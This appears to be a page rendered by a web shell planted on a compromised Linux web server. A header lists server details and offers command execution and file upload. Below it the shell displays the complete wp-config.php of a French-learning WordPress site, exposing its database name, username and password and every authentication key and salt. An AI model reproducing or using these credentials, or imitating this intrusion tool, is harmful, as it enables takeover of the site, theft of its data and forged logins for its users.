|
Server IP : 62.171.151.215 / Your IP : 216.73.217.19 Web Server : nginx/1.18.0 System : Linux vmi3128365 5.15.0-176-generic #186-Ubuntu SMP Fri Mar 13 11:01:42 UTC 2026 x86_64 User : alex ( 1000) PHP Version : 8.4.18 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF Directory (0755) : /var/www/workoutfacile.com/../camarchecafonctionne.com/../learnfrenchiseasy.com/ |
| [ Home ] | [ C0mmand ] | [ Upload File ] |
|---|
<?php
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the installation.
* You don't have to use the website, you can copy this file to "wp-config.php"
* and fill in the values.
*
* This file contains the following configurations:
*
* * Database settings
* * Secret keys
* * Database table prefix
* * ABSPATH
*
* @link https://developer.wordpress.org/advanced-administration/wordpress/wp-config/
*
* @package WordPress
*/
// ** Database settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'learnfrenchiseasy2026' );
/** Database username */
define( 'DB_USER', 'learnfrenchiseasy2026' );
/** Database password */
define( 'DB_PASSWORD', 'learnfrenchiseasy2026Z@@@' );
/** Database hostname */
define( 'DB_HOST', '127.0.0.1' );
/** Database charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8mb4' );
/** The database collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );
/**#@+
* Authentication unique keys and salts.
*
* Change these to different unique phrases! You can generate these using
* the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}.
*
* You can change these at any point in time to invalidate all existing cookies.
* This will force all users to have to log in again.
*
* @since 2.6.0
*/
define('AUTH_KEY', 'llMhE Z+%CB4f:yr]`1dW*n$uqKQ(eidDDA|FKD}as;;;@{p{T|WD^HQ>!u&5*0W');
define('SECURE_AUTH_KEY', 'e.cK!-f@q_[G5Uxi:|+STOnM/P.:H^a/a^)kUNdF>Vj8-m1<^e{NU{u4wVf?9%J2');
define('LOGGED_IN_KEY', 'dZI5^<M;eDfT#]V}p|JehQL[2|Iu$*/#;YSYH5|EnqYP)^irIOIDXq(k[@p`lmG~');
define('NONCE_KEY', 'HmJFB#I;N]`#(1Jy[9L+}Y+(-}VWs;~EEdSoM{6CS^0=Ic(M!~FCE{m`46Pm$hy}');
define('AUTH_SALT', 'HzXuK+P=i[- ,h}I 1u2i#T?SjF!u?.yCSGQ:O9P#c?,lkhFsUU-:)]To|C`/-[G');
define('SECURE_AUTH_SALT', 'A;emX>k!<|%!-Zw]l&!<.da~0VA 9Pp|a.QD8%T;RCEwR`[Td/gGrYN-dYY=K|z-');
define('LOGGED_IN_SALT', 'aAL|.{D; cyo+fKOI-!jQfnBaZW3>c7xEQEp;EvX_3jvc^Ow5qgk}%2~q7<`!e`6');
define('NONCE_SALT', 'Fk2oa:!.{cJQdz1bGhs.xVs`IB A()t7`q#xz0!,(-]5zAq`,Hxt^d.W|/Rv4;P(');
/**#@-*/
/**
* WordPress database table prefix.
*
* You can have multiple installations in one database if you give each
* a unique prefix. Only numbers, letters, and underscores please!
*
* At the installation time, database tables are created with the specified prefix.
* Changing this value after WordPress is installed will make your site think
* it has not been installed.
*
* @link https://developer.wordpress.org/advanced-administration/wordpress/wp-config/#table-prefix
*/
$table_prefix = 'wp_';
/**
* For developers: WordPress debugging mode.
*
* Change this to true to enable the display of notices during development.
* It is strongly recommended that plugin and theme developers use WP_DEBUG
* in their development environments.
*
* For information on other constants that can be used for debugging,
* visit the documentation.
*
* @link https://developer.wordpress.org/advanced-administration/debug/debug-wordpress/
*/
define( 'WP_DEBUG', false );
/* Add any custom values between this line and the "stop editing" line. */
/* That's all, stop editing! Happy publishing. */
/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
define( 'ABSPATH', __DIR__ . '/' );
}
/** Sets up WordPress vars and included files. */
require_once ABSPATH . 'wp-settings.php';
/** Canonical URL enforced by clean-www */
define( 'WP_HOME', 'https://www.learnfrenchiseasy.com' );
define( 'WP_SITEURL', 'https://www.learnfrenchiseasy.com' );
/** Forge-like defaults */
define("FS_METHOD", "direct");